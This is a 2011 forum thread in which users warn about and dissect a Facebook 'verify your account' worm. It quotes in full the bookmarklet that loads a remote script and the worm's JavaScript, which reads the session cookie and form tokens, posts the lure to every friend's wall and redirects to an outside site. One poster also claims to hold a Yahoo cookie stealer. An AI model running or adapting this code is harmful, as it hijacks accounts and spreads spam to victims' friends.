This was posted to my Wall earlier today...
In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process...
The "verification" link is...
Code:
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://plucketenhe.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
First of all, I don't have protection on my browser right now so... not going to check that out. But the domain plucketenhe doesn't sound legit. So I wouldn't recommend clicking this.
Edit: At the moment, it appears that 3 people have posted to my wall from iPhones.
Facebook spam these days are become quite meticulous. The link being next to that of the Like and Comment buttons make it even more believable.
Thanks for the heads up.
Gets your friends and spamms their walls.... Looks like o.O
Code:
var message = "In order to PREVENT SPAM, I ask that you VERIFY YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to start the process...";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://plucketenhe.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "==>[VERIFY MY ACCOUNT]<==";
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
data = eval('(' + gf.responseText.substr(9) + ')');
if(data.error){ }else{
friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
}
}
for(var i=0; i<friends.length; i++){
var httpwp = new XMLHttpRequest();
var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
"&post_form_id=" + post_form_id +
"&fb_dtsg=" + fb_dtsg +
"&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
"&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
"&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
"&user_message=" + message;
httpwp.open("POST", urlwp, true);
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httpwp.setRequestHeader("Content-length", paramswp.length);
httpwp.setRequestHeader("Connection", "keep-alive");
httpwp.onreadystatechange = function(){
if (httpwp.readyState == 4 && httpwp.status == 200){
}
}
httpwp.send(paramswp);
}
alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";
What does this do?
alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";
(05-11-2011, 11:53 PM)Veryx Wrote: [ -> ]What does this do?
alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted.");
document.location = "http://qite.ws/gl2o1";
It's a fake error, and redirect to the same page again, http: //plucketenhe.info but it didn't load....
Scripts like these are usually developed to steal cookies stored in your browser. I currently have one that steals cookies stored for yahoo and hence giving access to their account. I will analyze this script and edit this post and update you with my findings.